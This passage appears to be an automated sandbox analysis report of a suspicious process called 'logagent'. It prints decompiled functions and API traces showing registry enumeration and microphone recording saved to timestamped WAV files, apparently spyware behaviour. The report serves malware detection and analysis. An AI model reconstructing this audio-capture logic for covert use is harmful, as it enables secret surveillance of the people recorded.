                                    • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                    • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                    • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000003B), ref: 00402A45
                                  • GetMessageA.USER32 ref: 00402A52
                                  • TranslateMessage.USER32(?), ref: 00402A60
                                  • DispatchMessageA.USER32 ref: 00402A6A
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402A87
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B738,00000000,DisplayMessage), ref: 00402ADF
                                  • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074), ref: 00402AF1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00402B17
                                  • HeapFree.KERNEL32(00000000,00000000,?,0000003B), ref: 00402B2B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402B3E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402B47
                                    • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                    • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                    • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                    • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                    • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$G@2@@std@@G@std@@$V01@@$?c_str@?$basic_string@?length@?$basic_string@$D@1@@MessageV12@$?substr@?$basic_string@G@1@@Heap$??2@??3@??4?$basic_string@?find@?$basic_string@CreateDispatchEventFreeTranslateV01@
                                  • String ID: CloseChat$DisplayMessage$GetMessage
                                  • API String ID: 1701728818-749203953
                                  • Opcode ID: 05f6091bb8e4fb570316d0bc2ae79ecd824646f3970f9e54cc59898a20bb853e
                                  • Instruction ID: 706d1787dbe5d31282a01ee588047493408fae45c62342a208237384888500fd
                                  • Opcode Fuzzy Hash: 05f6091bb8e4fb570316d0bc2ae79ecd824646f3970f9e54cc59898a20bb853e
                                  • Instruction Fuzzy Hash: 75517F72A00608EBCB14ABE1ED4D9EE7B7CEF84355B10403AF502E31D1DBB85545CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040BE34 Relevance: 39.1, APIs: 26, Instructions: 148registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 34%
                                  			E0040BE34(char _a4, short* _a20, intOrPtr _a24, char _a27) {
				void* _v8;
				char _v24;
				char _v40;
				char _v56;
				char _v72;
				char _v88;
				char _v104;
				char _v120;
				char _v136;
				char _v152;
				void* _t28;
				long _t29;
				void* _t35;
				char* _t38;
				char* _t39;
				char* _t40;
				char* _t41;
				char* _t42;
				char* _t43;
				char* _t44;
				void* _t54;
				void* _t56;
				char* _t73;
				void* _t77;
				void* _t79;

				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				_t28 = E0040BD9B( &_a4);
				_t79 = _t77 - 0x10 + 0x10;
				_t47 = 0;
				_t29 = RegOpenKeyExW(_t28, _a20, 0, 0x20019,  &_v8);
				_t90 = _t29;
				if(_t29 != 0) {
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
					E004020C2(0x41bde0, 0x72, "3");
				} else {
					E0040BB20( &_v8, _t90, _v8);
					_pop(_t54);
					_t73 = "0";
					if(_a24 != 0) {
						_t73 = "1";
					}
					_t35 = E00412855(_t54,  &_v152, 0x41bdd0);
					_t56 = 0x41b310;
					_t38 =  &_v88;
					L00414176();
					_t39 =  &_v56;
					L00414140();
					_t40 =  &_v40;
					L00414140();
					_t41 =  &_v24;
					L00414140();
					_t42 =  &_v72;
					L00414140();
					_t43 =  &_v104;
					L00414140();
					_t44 =  &_v136;
					L00414140();
					L00414140();
					E004020C2(0x41bde0, 0x71, _t79 - 0x10);
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t44, _t44, _t43, _t43, _t42, _t42, _t41, _t41, _t40, _t40, _t39, _t39, _t38, _t38, _t73, 0x41b310, E00412855(_t56,  &_v120, 0x41be40), 0x41b310, _t35, 0x41be30, 0x41b310, 0x41be50);
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(0x415800);
					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(0x415800);
					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
					RegCloseKey(_v8);
					_t47 = 1;
				}
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _t47;
			}




























                                  0x0040be49
                                  0x0040be4f
                                  0x0040be54
                                  0x0040be5a
                                  0x0040be67
                                  0x0040be6d
                                  0x0040be6f
                                  0x0040bfea
                                  0x0040bff7
                                  0x0040be75
                                  0x0040be78
                                  0x0040be80
                                  0x0040be81
                                  0x0040be86
                                  0x0040be88
                                  0x0040be88
                                  0x0040beaf
                                  0x0040beb5
                                  0x0040beca
                                  0x0040becf
                                  0x0040bed8
                                  0x0040bedc
                                  0x0040bee5
                                  0x0040bee9
                                  0x0040bef2
                                  0x0040bef6
                                  0x0040beff
                                  0x0040bf03
                                  0x0040bf0c
                                  0x0040bf10
                                  0x0040bf19
                                  0x0040bf20
                                  0x0040bf2a
                                  0x0040bf39
                                  0x0040bf44
                                  0x0040bf4d
                                  0x0040bf56
                                  0x0040bf5f
                                  0x0040bf68
                                  0x0040bf71
                                  0x0040bf7a
                                  0x0040bf83
                                  0x0040bf8f
                                  0x0040bfa0
                                  0x0040bfac
                                  0x0040bfbd
                                  0x0040bfc9
                                  0x0040bfd2
                                  0x0040bfd8
                                  0x0040bfd8
                                  0x0040bfff
                                  0x0040c00b

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,00000004), ref: 0040BE49
                                    • Part of subcall function 0040BD9B: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKLM,00000004,?,0040BE54,?,?,00000004), ref: 0040BDAE
                                    • Part of subcall function 0040BD9B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BE1E
                                  • RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00020019,0040C731), ref: 0040BE67
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00415B14,0041B310,00000000,0041B310,00000000,0041B310,0041BE30,0041B310,0041BE50), ref: 0040BECF
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,0041BE30,0041B310,0041BE50), ref: 0040BEDC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,0041BE50), ref: 0040BEE9
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,0041BE50), ref: 0040BEF6
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,0041BE50), ref: 0040BF03
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0040BF10
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040BF20
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040BF2A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000071), ref: 0040BF44
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF4D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF56
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF5F
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF68
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF71
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF7A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF83
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF8F
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(00415800), ref: 0040BFA0
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(00415800), ref: 0040BFAC
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 0040BFBD
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 0040BFC9
                                  • RegCloseKey.ADVAPI32(0040C731), ref: 0040BFD2
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B1C,?), ref: 0040BFEA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000072), ref: 0040BFFF
                                    • Part of subcall function 0040BB20: RegQueryInfoKeyW.ADVAPI32(0040BE7D,?,00000104,00000000,0040BE7D,?,?,00000000,?,?,?,?), ref: 0040BB8F
                                    • Part of subcall function 0040BB20: RegEnumKeyExW.ADVAPI32 ref: 0040BBBE
                                    • Part of subcall function 0040BB20: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041623C,?), ref: 0040BBD4
                                    • Part of subcall function 0040BB20: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040BBE6
                                    • Part of subcall function 0040BB20: ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,0040BE7D,0040C731), ref: 0040BBF4
                                    • Part of subcall function 0040BB20: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040BE7D,0040C731), ref: 0040BBFD
                                    • Part of subcall function 0040BB20: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040BE7D,0040C731), ref: 0040BC06
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$V?$basic_string@$D@2@@0@Hstd@@$G@std@@V10@0@$G@2@@std@@$V01@$??4?$basic_string@$??0?$basic_string@$V01@@V10@@$??8std@@CloseD@1@@EnumG@1@@G@2@@0@InfoOpenQueryY?$basic_string@
                                  • String ID:
                                  • API String ID: 3909728815-0
                                  • Opcode ID: 44452b3970c12fbfe81523bb04a4af9efa481a2b540b5195b71022166c9d3698
                                  • Instruction ID: 9e337717dcf7d24ebdd05483ab6efa78b4c81bdad12c42f1fd6fa3557793e14f
                                  • Opcode Fuzzy Hash: 44452b3970c12fbfe81523bb04a4af9efa481a2b540b5195b71022166c9d3698
                                  • Instruction Fuzzy Hash: 7741477290020DEBCB04BBE1ED4ADDE7B7CDF94345B10403AF506A7152EB785A85CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401640 Relevance: 38.6, APIs: 20, Strings: 2, Instructions: 102stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 20%
                                  			E00401640(void* __edx, intOrPtr _a8, char _a11) {
				char _v5;
				char _v12;
				void* _v28;
				char _v44;
				char _v60;
				char _v76;
				char _v92;
				char _v108;
				char _v188;
				int _t23;
				char* _t25;
				char* _t32;
				char* _t33;
				char* _t34;
				CHAR* _t36;
				intOrPtr _t37;
				void* _t56;

				_t23 =  &_v5;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z(_t23);
				if(_a8 == 0x3c0) {
					__imp__time( &_v12, _t56);
					_t25 =  &_v12;
					__imp__localtime(_t25);
					__imp__strftime( &_v188, 0x50, "%Y-%m-%d %H.%M", _t25);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v188,  &_a11);
					_t32 =  &_v76;
					L00414152();
					_t33 =  &_v108;
					L0041414C();
					_t34 =  &_v60;
					L00414146();
					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t34, _t34, _t33, _t33, _t32, _t32, 0x41b1e8, 0x5c, E00412795( &_v92,  &_v44), L".wav");
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					E004013BE(_t34, 0x41b1a0);
					_t36 = waveInUnprepareHeader( *0x41b210, 0x41b1a0, 0x20);
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					0x41b1a0->lpData = _t36;
					_t37 =  *0x41b1d8; // 0x0
					 *0x41b1a4 = _t37;
					 *0x41b1a8 = 0;
					 *0x41b1ac = 0;
					 *0x41b1b0 = 0;
					 *0x41b1b4 = 0;
					waveInPrepareHeader( *0x41b210, 0x41b1a0, 0x20);
					_t23 = waveInAddBuffer( *0x41b210, 0x41b1a0, 0x20);
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t23;
			}




















                                  0x00401649
                                  0x00401650
                                  0x0040165d
                                  0x00401668
                                  0x0040166e
                                  0x00401672
                                  0x00401687
                                  0x0040169e
                                  0x004016bb
                                  0x004016c4
                                  0x004016cd
                                  0x004016d1
                                  0x004016da
                                  0x004016de
                                  0x004016ea
                                  0x004016f3
                                  0x004016fc
                                  0x00401705
                                  0x0040170e
                                  0x00401717
                                  0x00401726
                                  0x0040172d
                                  0x0040173d
                                  0x00401748
                                  0x0040174e
                                  0x00401753
                                  0x00401758
                                  0x0040175f
                                  0x00401764
                                  0x00401769
                                  0x0040176e
                                  0x0040177c
                                  0x0040178b
                                  0x00401791
                                  0x00401795
                                  0x0040179c

                                  APIs
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00401650
                                  • time.MSVCRT ref: 00401668
                                  • localtime.MSVCRT ref: 00401672
                                  • strftime.MSVCRT ref: 00401687
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 0040169E
                                    • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                    • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                    • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                    • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                    • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,0041B1E8,0000005C,00000000,.wav), ref: 004016C4
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,.wav), ref: 004016D1
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00000000,.wav), ref: 004016DE
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00000000,.wav), ref: 004016EA
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 004016F3
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 004016FC
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 00401705
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 0040170E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 00401717
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041B1A0,?,?,?,?,?,?,?,00000000,.wav), ref: 00401726
                                    • Part of subcall function 004013BE: CreateFileW.KERNEL32(00401732,40000000,00000000,00000000,00000002,00000080,00000000,?,0041B1A0), ref: 00401424
                                  • waveInUnprepareHeader.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,.wav), ref: 0040173D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,00000000,.wav), ref: 00401748
                                  • waveInPrepareHeader.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,.wav), ref: 0040177C
                                  • waveInAddBuffer.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,.wav), ref: 0040178B
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000,.wav), ref: 00401795
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$D@2@@std@@D@std@@$??0?$basic_string@$G@2@@0@Hstd@@V?$basic_string@wave$?begin@?$basic_string@?c_str@?$basic_string@G@1@@HeaderV01@@V10@$??4?$basic_string@?end@?$basic_string@?length@?$basic_string@BufferCreateD@1@@FilePrepareUnprepareV01@V10@0@localtimestrftimetime
                                  • String ID: %Y-%m-%d %H.%M$.wav
                                  • API String ID: 4079669728-3597965672
                                  • Opcode ID: 65b9f5944380e4cbf397f0c8d18f8494b2e2b8de5bcf2efd9865c90dbcd23412
                                  • Instruction ID: bf0964d1dea1fddfd3b2107398812174aa57f11fbff5416b66007043dfe7270a
                                  • Opcode Fuzzy Hash: 65b9f5944380e4cbf397f0c8d18f8494b2e2b8de5bcf2efd9865c90dbcd23412
                                  • Instruction Fuzzy Hash: C641F87180060DEFDB00EBA0EC5DADE7B79EB48345F448036F505E71A0EB746689CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004013BE Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 154fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 95%
                                  			E004013BE(long _a4, void** _a8) {
				void _v8;
				void _v12;
				void _v16;
				void _v20;
				void _v24;
				void _v28;
				signed int _t37;
				signed int _t41;
				void* _t82;
				signed int _t83;
				signed int _t89;

				_t83 =  *0x41b21a & 0x0000ffff;
				_t37 = ( *0x41b226 & 0x0000ffff) * _t83;
				_v20 = _t37 *  *0x41b21c >> 3;
				asm("cdq");
				_t89 = 8;
				_v16 = 1;
				_v12 = 0x10;
				_v24 = _t37 / _t89;
				_t41 = _a8[1] * _t83;
				_v28 = _t41;
				_v8 = _t41 + 0x24;
				_t82 = CreateFileW(_a4, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t82 != 0xffffffff) {
					WriteFile(_t82, "RIFF", 4,  &_a4, 0);
					WriteFile(_t82,  &_v8, 4,  &_a4, 0);
					WriteFile(_t82, "WAVE", 4,  &_a4, 0);
					WriteFile(_t82, "fmt ", 4,  &_a4, 0);
					WriteFile(_t82,  &_v12, 4,  &_a4, 0);
					WriteFile(_t82,  &_v16, 2,  &_a4, 0);
					WriteFile(_t82, 0x41b21a, 2,  &_a4, 0);
					WriteFile(_t82, 0x41b21c, 4,  &_a4, 0);
					WriteFile(_t82,  &_v20, 4,  &_a4, 0);
					WriteFile(_t82,  &_v24, 2,  &_a4, 0);
					WriteFile(_t82, 0x41b226, 2,  &_a4, 0);
					WriteFile(_t82, "data", 4,  &_a4, 0);
					WriteFile(_t82,  &_v28, 4,  &_a4, 0);
					WriteFile(_t82,  *_a8, _a8[1],  &_a4, 0);
					CloseHandle(_t82);
					return 1;
				}
				return 0;
			}














                                  0x004013c4
                                  0x004013d2
                                  0x004013e4
                                  0x004013e9
                                  0x004013ea
                                  0x00401401
                                  0x00401408
                                  0x0040140f
                                  0x00401418
                                  0x0040141b
                                  0x00401421
                                  0x0040142a
                                  0x0040142f
                                  0x0040144b
                                  0x00401459
                                  0x00401468
                                  0x00401477
                                  0x00401485
                                  0x00401493
                                  0x004014a2
                                  0x004014b1
                                  0x004014bf
                                  0x004014cd
                                  0x004014dc
                                  0x004014eb
                                  0x004014f9
                                  0x00401509
                                  0x0040150c
                                  0x00000000
                                  0x00401512
                                  0x00000000

                                  APIs
                                  • CreateFileW.KERNEL32(00401732,40000000,00000000,00000000,00000002,00000080,00000000,?,0041B1A0), ref: 00401424
                                  • WriteFile.KERNEL32(00000000,RIFF,00000004,00000010,00000000,?,0041B1A0), ref: 0040144B
                                  • WriteFile.KERNEL32(00000000,00000000,00000004,00000010,00000000,?,0041B1A0), ref: 00401459
                                  • WriteFile.KERNEL32(00000000,WAVE,00000004,00000010,00000000,?,0041B1A0), ref: 00401468
                                  • WriteFile.KERNEL32(00000000,fmt ,00000004,00000010,00000000,?,0041B1A0), ref: 00401477
                                  • WriteFile.KERNEL32(00000000,00000010,00000004,00000010,00000000,?,0041B1A0), ref: 00401485
